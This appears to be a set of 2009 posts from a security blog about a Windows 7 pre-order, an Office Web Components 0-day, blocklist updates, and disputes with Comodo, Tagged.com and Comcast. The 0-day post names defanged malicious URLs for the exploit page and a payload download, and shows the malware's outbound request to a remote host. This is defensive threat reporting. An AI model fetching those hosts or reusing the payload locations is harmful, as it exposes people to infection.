Let the Windows 7 pre-order madness begin!

I am pleased to inform those of you in the UK, that you can now pre-order the brand new Windows 7, due for release in October, for as little as £49 for Home Premium, and £99 for the Professional edition - that's quite the saving. You've got to hurry however, as stocks are limited and it's pretty much a guarantee that these are going to sell out rather quickly (going to be ordering it myself when I get my paycheck in August).

The following are the full details;

At midnight on Wednesday 15 July, Microsoft’s new operating system, Windows 7, goes on pre-sale to people in the UK at a special introductory price, but you’ll have to be quick as prices are low, stocks are limited and it is first come first served!

To say thanks to its loyal customers and enthusiasts, especially those who have taken part in the Beta and Release Candidate (RC) programmes, Microsoft will be offering pre-order copies of Windows 7 at one-off promotional prices* of £49.99 for Home Premium and £99.99 for Professional. This is a great opportunity for your readers to get their hands on the best Windows operating system of all time and save plenty of money in the process.

The Windows 7 Beta and RC versions have been very well received by consumers and media alike, and both have been downloaded by millions of people worldwide. To pre-order a discounted copy of the final version of Windows 7 you need to contact our selected retail partners listed below or go to www.microsoft.com/uk/win7preorder.

Finally, a quick reminder for our UK customers: if you are replacing an older version of Windows with Windows 7 once it arrives on 22 October, a clean install of the operating system and the installation of an internet browser will be required. For more information on how to do this go to www.microsoft.com/uk/win7preorder and for general information on other aspects of Windows 7, please visit www.microsoft.co.uk/windows.

Partner list:

Microsoft Store

http://emea.microsoftstore.com/UK/Microsoft/Windows/Windows-Vista/Windows-7-Preview

Amazon.co.uk

http://www.amazon.co.uk/s/?ie=UTF8&rh=i%3Aaps%2Ck%3AB002DUCMT2|B002DUCMTC|B001XCWGII

Comet

http://www.comet.co.uk/shopcomet/advice/758/Windows-7

Currys

www.currys.co.uk/preorder

Ebuyer.com

TBC

Play.com

http://www.play.com/PC/PCs/3-/379971/2-/Promo.html

Littlewoods

TBC

Micro Anvika

www.anvika.com/windows7preorder

PCWorld

www.pcworld.co.uk/preorder

Staples

http://www.staples.co.uk/ENG/static/wrapper.asp?param=windows7/windows7.htm&ns_campaign=Microsoft_Windows_7&ns_mchannel=BA-ext&ns_source=Microsoft&ns_linkname=Microsoft_Windows_7&ns_fees=0&sec_type=ext

Argos

www.argos.co.uk

John Lewis

http://www.johnlewispartnership.co.uk/

Tesco

http://direct.tesco.com/p/inc/specials/windows7/

Dixons

www.dixons.co.uk/preorder

Who is Exploiting the Office Web Components 0-day?

Just a day before Patch Tuesday, when Microsoft is going to release couple of patches for DirectShow vulnerabilities including MSVIDCTRL 0-day , IE (Internet Explorer) users are hit by another surprise. A new 0-day vulnerability has been identified in MS office web component and is currently being exploited via the IE scripting interface. There is no patch available at the moment but MS has come up with a workaround.

One of the malicious URL which has been found to exploit this vulnerability is hxxp://www.fdsdffdfsf.cn/of.htm.

Here is what the exploit page looks like:

....

If successfully exploited, the above shell code fetches a malware binary from hxxp://www.fdasfadf.cn/new.exe

Let's see what the actual payload i.e new.exe is all about.

Here is VirtusTotal report for new.exe

Upon execution this malware produces outbound communication like this:

GET /hao.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.98765W; Windows NT 5.1; SV1)
Host: www.qvod69.cn
Connection: Keep-Alive

Read more
http://blog.fireeye.com/research/2009/07/who-is-exploiting-office-web-components-0day.html?cid=6a00d835018afd53ef0115720324c1970b

References:

Office Web Components exploits in the wild
http://www.malwaredomainlist.com/forums/index.php?topic=3123.0

Update to sURL

In light of the following, I've modified the sURL service, to prevent short URL's being created that point to other known short URL providers.

http://blog.flo.cx/2009/06/loops-and-stretching-with-urlshorteners

If you find a short URL that is allowed, please let me know (I think I've covered them all, but I'm prone to error just like everyone else ;o)).

Microsoft Security Advisory (973472)

Go get it folks!

Microsoft Security Advisory (973472)

Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution

Microsoft is investigating a privately reported vulnerability in Microsoft Office Web Components. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. When using Internet Explorer, code execution is remote and may not require any user intervention.

We are aware of attacks attempting to exploit the vulnerability.

Customers may prevent the Microsoft Office Web Components from running in Internet Explorer either manually, using the instructions in the Workaround section, or automatically, using the solution found in Microsoft Knowledge Base Article 973472.

Fix It solution is available and applies to:
Microsoft Office Small Business Accounting 2006
Microsoft Office 2003 Web Components for the 2007 Microsoft Office system
Microsoft Office 2003 Service Pack 3
Microsoft Office 2003 Web Components
Microsoft Internet Security and Acceleration Server 2004 Standard Edition

Fix It solution is in http://support.microsoft.com/kb/973472
More info on this security advisory in http://blogs.technet.com/msrc/archive/2009/07/13/microsoft-security-advisory-973472-released.aspx
http://www.microsoft.com/technet/security/advisory/973472.mspx

Special thanks to Donna and Corrine for the heads up.

Microsoft Security Advisory (973472) - FixIt solution is available
http://msmvps.com/blogs/donna/archive/2009/07/14/microsoft-security-advisory-973472-released-fixit-solution-is-available.aspx

Microsoft Security Advisory 973472 Released
http://securitygarden.blogspot.com/2009/07/microsoft-security-advisory-973472.html

Now I've got to figure out why the advisory hasn't come to my inbox yet .....

Major addition to hpHosts blacklist

Just a note folks, after identifying some new Internet Service Team ranges, I am currently in the process of adding over 3000 new entries to the database. I am seriously wishing the HOSTS file allowed blocking IP ranges, as this could've easily been accomplished by adding the following single line to the blacklist (which is what you can add to your firewall filter if you've not already done so).

217.20.112.0, 217.20.127.255

This block is used by the IST, and owned, surprise surprise, by NetDirekt (yep, I already knew that, which is why it's not a surprise). 217.20.112.* is already in hpHosts, but 113-127 is not (at least, not completely, little scraps here and there were already in the database).

You can see all of the IP ranges I am aware of that are in use by the IST at;

hosts-file.net/pest.asp?show=internetserviceteam

---

References:

Google poisoning, IST, rogues and 250+ reasons to avoid 209.44.* ......
http://hphosts.blogspot.com/2009/05/google-poisoning-ist-rogues-and-250.html

IST (Internet Service Team - *.internetserviceteam.com) in blackhat SEO campaign - again
http://hphosts.blogspot.com/2009/05/ist-internet-service-team.html

MalwareURL: Internet Service Team
http://www.malwareurl.com/search.php?domain=&s=internetserviceteam&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on&ns=on

MalwareURL: AS28753
http://www.malwareurl.com/search.php?domain=&s=AS28753&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on

MalwareDomainList: Internet Service Team
http://malwaredomainlist.com/mdl.php?search=internetserviceteam&colsearch=All&quantity=50

hpHosts network down

I'm sorry to inform you all, due to a power cut a few minutes ago, the entire hpHosts network is currently offline (having to post this from a rubbish 3G connection).

I've spoken to the power company who informed they are aware of the problem and expect it to be back online by 8am (approx 1 hour 10 minutes). Hopefully it hasn't fried the servers again (on surge protectors, so shouldn't have).

Apologies for the inconvenience folks.

/edit 07:02

I'm pleased to announce, the power is back online, and all servers are online and functioning properly.

Comodo: Watch your staff please (oh and a little correction)

Not content with Melih's blaming MS MVP, Donna Buenaventura for a blog posting by someone else, one of Melih's moderators have gone one step further and posted;

"We should hack her site and post the truth"

Let me make this VERY clear Melih, and I suggest your staff take note. Whether meant seriously or not, this kind of behaviour from self claimed "professionals" working for an alledged, legit security company, are NOT going to do you any favours - quite the opposite.



Looking at the comments on Mike's blog concerning this, shows the Comodo supporters have also not bothered to take note of who actually owns that blog - and it's not Donna. This one for example, by another of Comodo's moderators, shows they evidently don't practice what they preach;

http://msmvps.com/blogs/hostsnews/archive/2009/07/10/1699205.aspx#1699791

Though this does make for hillarious reading (and a major thanks to Mike for publishing them ;o)).

References:

Comodo and the ongoing trust saga
http://hphosts.blogspot.com/2009/07/comodo-and-ongoing-trust-saga.html

Comodo continue to issue certificates to known Malware
http://www.calendarofupdates.com/updates/index.php?showtopic=19279

Comodo and the ongoing trust saga

Several issues were brought to light about Comodo over the past lord knows how long, and the latest incident, as with many before it, concern their SSL certs. In this case, Melih's defense is that these are DV certs, and thus do not require "validation" as to the identity of the person obtaining such - this might be the case, but when your tag line is "Creating Trust Online", your defense should NOT be to try and slag off those bringing such to light, or telling them to get in touch with someone else to get this sorted out - IT IS YOUR COMPANY, YOUR CERTIFICATES - YOUR PROBLEM!

If DV certs do not require validation as to the identity or anything else, of the person obtaining such, there's a simple solution - STOP PROVIDING THEM!. Surely you have a choice as to the type of certificate you can issue?

Even if you are forced to offer DV certs, you still have a responsibility to monitor the use of such, and if you don't have the staff to do so, then either hire more staff or STOP ISSUING CERTIFICATES UNTIL YOU HAVE THE INFRASTRUCTURE TO PROPERLY MONITOR SUCH!.

As far as HopSurf, I really couldn't care less who owns it or who developed it - Comodo is alledgedly a security company, again, the tag line comes into play here - Creating Trust Online. Lets see how NOT to create trust shall we?

1. Thou shalt require those installing HopSurf be over 18
2. Thou shalt ensure the toolbar is PRE-TICKED

Yep, great way to create trust there ....

Requiring those installing HopSurf be over 18 implies that the content it provides, is of an adult nature and thus, unsuitable for minors - you do not restrict the ages of those installing your other products, and more importantly (and why I have to point this out AGAIN is beyond me), YOU ARE A SECURITY COMPANY, YOU HAVE NO BUSINESS BEING INVOLVED IN ADULT ONLY CONTENT!!!

References:

Is Comodo President/CEO a Liar? You Decide
http://securitygarden.blogspot.com/2009/07/is-comodo-presidentceo-liar-you-decide.html

Here we go again..
http://forums.comodo.com/empty-t42573.0.html;msg288724;topicseen

Parents, beware of Comodo firewall
http://securitygarden.blogspot.com/2009/07/parents-beware-of-comodo-firewall.html

Comodo continues to damage it's reputation
http://msmvps.com/blogs/hostsnews/archive/2009/07/10/1699205.aspx

Comodo STILL supporting the criminal fraternity (the bad guys)
http://hphosts.blogspot.com/2009/07/comodo-still-supporting-criminal.html

Tagged.com being sued - and about bloody time too!

Tagged.com, well known for quite some time, for using the same malicious tactics as a few other like sites I could mention, are finally to be sued by the New York Attorney General

New York Attorney General Andrew Cuomo charged social networking site Tagged.com Thursday with spamming and stealing identities from 60 million of its users by sending illegal e-mails that raided their personal contact lists.

Cuomo served Tagged with a notice of intent, announcing that his office planned to sue the social networking site for concocting an illegal scheme to bolster traffic numbers and reel in millions of new users.

"This company stole the address books and identities of millions of people," Cuomo said in a statement. "Consumers had their privacy invaded and were forced into the embarrassing position of having to apologize to all their e-mail contacts for Tagged's unethical -- and illegal -- behavior."

San Francisco-based Tagged.com boasts 80 million users and touts itself as the third largest social networking site after Facebook and MySpace.

According to the notice of intent, Cuomo charged that Tagged tricked most of those users into handing over access to their e-mail contact lists. The company then used the contact lists to send out promotional spam that appeared as if it was coming from a personal contact. In actuality, the fraudulent e-mails were sent by Tagged from pilfered contact lists, the New York Attorney General's Office said.

Read more
http://www.crn.com/security/218401533;jsessionid=2HQKNHDMVIQC2QSNDLPSKH0CJUNN2JVN

Comcast using unethical tactics to force crapvertising on users

First Verisign, then lord knows who else, and now Comcast it seems, want to force advertising on their users, using tactics that are unethical at best, and blackhat at worst. Worse still, as Randy describes, they're making users that want to opt-out jump through hoops, instead of going the ethical route of opt-in.

Read more
http://www.eset.com/threat-center/blog/?p=1300

If you aren't already, switch your Comcast (and any others, for those of you not with Comcast) DNS servers to OpenDNS;

www.opendns.com

Yes OpenDNS also redirect 404's, but the difference is, they're up front about it, and you can turn it off with the unticking of a box (they're also not charging you for using their services).